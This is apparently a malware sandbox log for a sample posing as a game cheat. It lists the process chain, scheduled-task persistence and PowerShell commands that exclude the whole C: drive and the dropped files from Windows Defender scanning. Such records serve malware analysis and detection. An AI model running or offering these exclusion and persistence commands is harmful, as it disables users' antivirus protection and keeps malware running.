                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_03
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\AppData\Local\Temp\m5fi0urdJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" "
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCommand line argument: sfxname0_2_00D0DF1E
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCommand line argument: sfxstime0_2_00D0DF1E
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCommand line argument: STARTDLG0_2_00D0DF1E
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeVirustotal: Detection: 56%
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeReversingLabs: Detection: 68%
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeFile read: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe "C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe"
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\msportComWin\BridgePortsurrogateserverref.exe "C:\msportComWin/BridgePortsurrogateserverref.exe"
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP"
                                    Source: unknownProcess created: C:\msportComWin\jnowHpJlZlXal.exe C:\msportComWin\jnowHpJlZlXal.exe
                                    Source: unknownProcess created: C:\msportComWin\jnowHpJlZlXal.exe C:\msportComWin\jnowHpJlZlXal.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6615.tmp" "c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP"
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnowHpJlZlXalj" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'" /rl HIGHEST /f
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BridgePortsurrogateserverrefB" /sc MINUTE /mo 13 /tr "'C:\msportComWin\BridgePortsurrogateserverref.exe'" /f
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\msportComWin\BridgePortsurrogateserverref.exe C:\msportComWin\BridgePortsurrogateserverref.exe
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat"
                                    Source: unknownProcess created: C:\msportComWin\BridgePortsurrogateserverref.exe C:\msportComWin\BridgePortsurrogateserverref.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Recovery\services.exe C:\Recovery\services.exe
                                    Source: unknownProcess created: C:\Recovery\services.exe C:\Recovery\services.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\msportComWin\BridgePortsurrogateserverref.exe "C:\msportComWin/BridgePortsurrogateserverref.exe"Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline"Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline"Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6615.tmp" "c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: sppc.dllJump to behavior
